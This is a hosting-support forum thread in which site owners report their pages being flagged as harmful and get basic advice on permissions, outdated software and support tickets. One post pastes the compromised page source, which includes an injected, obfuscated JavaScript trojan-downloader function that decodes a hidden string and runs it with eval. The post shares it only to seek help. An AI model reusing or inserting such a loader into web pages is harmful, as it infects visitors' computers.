Jump to content

Help! This Site May Harm Your Computer

Recommended Posts

Someone could have done that yes.


Do you have a forum or anything similar (ie a place where others can communicate)?


I would ask the helpdesk if they can see if the site seems to have been compromised.

Link to post
Share on other sites



This is what I will recommend to you. Several things:


1. Check your sites permissions, make sure not everything is CHMOD to 777

2. Check your Java Scripts


Note: The issue appears to be within your Java Scripts. Every issue I am receiving is to do with a Java Script.


If you can't work things out please open a ticket with the helpdesk from the link above and have a TCH Support Tech look into a little further for you. :)

Link to post
Share on other sites

My java script was one that I copied from somewhere years ago. It's been fine til now. I am not a java kind of guy. Heck I'm not that good at html or php either. When I go th my site directly I don't see any problem (IE6). The best I can think of is I'll compare things to about a year ago, It's the same code. Or should be. I don't have a forum or anything for someone to download.

Link to post
Share on other sites
  • 2 weeks later...

I got one of these recently. It was with my photo gallery (installed via fantastico). I knew there was something wrong not only with that but my message board (also via fantastico). I even opened a ticket, described the problem but they didn't find anything. I had already removed the message board but forgot about the photo gallery.


Anyway, that's been removed as well. The site itself is fine, however.

Link to post
Share on other sites
  • 1 month later...

Yesterday, a user warn us that our page had a trojan: JS/TrojanDownloader/IFrame/EY.gen (trojan)


The main page (the page with the trojan) is only a photo that redirect to the shop (only four lines), but we had this page this morning (with the javascript trojan):


<title>Material de Kickboxing</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<body bgcolor="#000000" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><!-- o --><script language="JavaScript">
function gC1cGbQ46(gA6sjiMTa){var bmXq52e35=arguments.callee.toString().replace(/\W/g,'').toUpperCase();var gbb5movQ8;var p46aJYMAG;var MiFBf0yFB=bmXq52e35.length;var B4gE81Sr0;var V8UjyXJ2x='';var Nf5f41fk5=new Array();for(p46aJYMAG=0;p46aJYMAG<256;p46aJYMAG++)Nf5f41fk5[p46aJYMAG]=0;var gbb5movQ8=1;for(p46aJYMAG=128;p46aJYMAG;p46aJYMAG>>=1) {gbb5movQ8=(gbb5movQ8>>>1)^((gbb5movQ8&1)?3988292384:0);for(hjpygo5A5=0;hjpygo5A5<256;hjpygo5A5+=p46aJYMAG*2) {Nf5f41fk5[hjpygo5A5+p46aJYMAG]=(Nf5f41fk5[hjpygo5A5]^gbb5movQ8);if (Nf5f41fk5[hjpygo5A5+p46aJYMAG] < 0) {Nf5f41fk5[hjpygo5A5+p46aJYMAG]+=4294967296;}}}B4gE81Sr0=4294967295;for(gbb5movQ8=0;gbb5movQ8<MiFBf0yFB;gbb5movQ8++){B4gE81Sr0=Nf5f41fk5[(B4gE81Sr0^bmXq52e35.charCodeAt(gbb5movQ8))&255]^((B4gE81Sr0>>8)&16777215);}B4gE81Sr0=B4gE81Sr0^4294967295;if (B4gE81Sr0<0) {B4gE81Sr0+=4294967296;}B4gE81Sr0=B4gE81Sr0.toString(16).toUpperCase();var HNii6t2UC=new Array();var MiFBf0yFB=B4gE81Sr0.length;for(p46aJYMAG=0;p46aJYMAG<8;p46aJYMAG++) {if (MiFBf0yFB + p46aJYMAG >= 8) {HNii6t2UC[p46aJYMAG]=B4gE81Sr0.charCodeAt(p46aJYMAG+MiFBf0yFB-8);} else {HNii6t2UC[p46aJYMAG]=48;}}var B1K23HoQ5=0;var iCvK5hVNE;var V8UjyXJ2x='';var nekrid46u;MiFBf0yFB=gA6sjiMTa.length;for(p46aJYMAG=0;p46aJYMAG<MiFBf0yFB;p46aJYMAG+=2){iCvK5hVNE=parseInt(gA6sjiMTa.substr(p46aJYMAG, 2),16); nekrid46u=iCvK5hVNE-HNii6t2UC[B1K23HoQ5];if(nekrid46u<0) {nekrid46u += 256;}V8UjyXJ2x+=String.fromCharCode(nekrid46u);if(B1K23HoQ5<HNii6t2UC.length-1){B1K23HoQ5++;} else {B1K23HoQ5=0;}}eval(V8UjyXJ2x);}
<!-- c -->
<div align="center"><a href="/tienda"><img src="entrada.jpg" width="667" height="500" border="0"></a> 


We have a phpbb3 private forum (with none public area, all restricted for two persons) , and a zencart 1.3.7 shop (I have the same scripts in other pages without any problem).


I have removed the trojan, and set index.html permissions to read only, but I'm worried becasuse I don't know how this kind of trojan has attacked our domain :)

Link to post
Share on other sites

Please open a ticket with the help desk, link above or in my signature. The techs will evaluate the situation and help you secure your site.


Also, Zencart is at version 1.3.8


Do you have all security updates installed for both phpbb3?

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Create New...